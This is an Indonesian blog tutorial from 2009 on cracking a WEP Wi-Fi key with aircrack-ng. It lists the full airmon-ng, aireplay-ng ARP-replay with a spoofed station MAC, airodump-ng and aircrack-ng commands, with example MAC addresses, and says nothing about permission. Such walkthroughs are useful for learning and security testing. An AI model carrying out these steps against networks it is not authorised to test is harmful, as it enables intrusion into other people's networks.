Pages

Monday, July 20, 2009

Simple Wep Hack

Peralatan yang Di gunakan:
1. OS ubuntu 9.04
2. Wireless Usb TL-WN422G
3. Aircrack-ng
4. Driver Compat-wireless yang sudah di patch

Data radio :
1. Mac address TL-WN422G = 00:21:27:C4:5A:2D
2. wireless interaface TL-WN422G = Wlan0
2. Mac addeess access point (bssid) = 00:19:E0:6E:18:4F
3. WIreless AP name = AP_SEC

Ok langsung saja
1. Buka Konsole unik sebagai Root untuk menjalankan semua perintah di bawah ini.
2. Start wireless interface pada monitor mode
" airmon-ng start [interface] [channel] "

( start wlan0 pada channel 1)
Bold
3. Test Wireless packet injection.

" aireplay-ng -9 mon0 "
" -9 " = mode injection test
" mon0 " = interface wlan0 enable monitor mode pada mon0 (bisa dilihat saat start airmon-ng)

Ok pakcket injection berjalan normal
note : untuk ap yang replaynya " 0/30 : 0% " kemungkinan besar Tx power dari wireless kita tidak sampai ke access point!

4. Start airodump-ng untuk capturing IVS

"airodump-ng -c 1 --ivs -w AP_SEC --bssid 00:19:E0:6E:18:4F wlan0"
"-c" = channel yang di gunakan
"--ivs" = hanya capture ivs saja
"-w" = write ivs data dengan nama "AP_SEC"
"--bssid" / "-b" = accesspoint mac address
"wlan0" = interface yang di gunakan


bisa anda lihat di bagian bawah gambar station dari accesspoint juga terlihat "00:19:E0:0F:DB:88" , catat mac adrress station tersebut karena akan kita gunakan untuk proses injection dengan aireplay-ng

5. Start aireplay-ng pada ARP request mode

pada console yang lain start aireplay-ng pada ARP request mode.
' aireplay-ng -3 -b 00:19:E0:6E:18:4F -h 00:19:E0:0F:DB:88 mon0 '
" -3 " = ARP request mode
" -b " = bssid atau mac address access point
" -h " = chane hardware address mon0 (disamakan dengan mac address station yang sudah assosiated dengan AP agar lebih cepat injectionnya)
tunggu sampai mendapatkan ARP request dan berhasil ngesent packet ke AP.


setelah ada send lihat di console airodump-ng maka data ivs akan naik dengan cepat.



tunggu kira 2 data ivs sudah mencapai +-200ribu ivs.



setelah setelah data yang terkumpul mencapai -+200ribu ivs maka close airodump-ng dan aireplay-ng.

6. Jalankan aircrack-ng untuk mendapatkan WEP key

' aircrack-ng -a 1 -b 00:19:E0:6E:18:4F AP_SEC-01.ivs ' + enter
' -a ' = mode WEP
' -b ' = mac address ap yang di cari wepnya
' AP_SEC-01.ivs ' = file ivs hasil capturing dari airodump-ng
Akan terliat seperti gambar di bawah ini


Dalam hitungan detik WEP key akan kita dapatkan :)

Untuk ,kritik ,saran dan perytanyaan udah langsung comment aja.. Thanks

2 comments:

Our Sponsor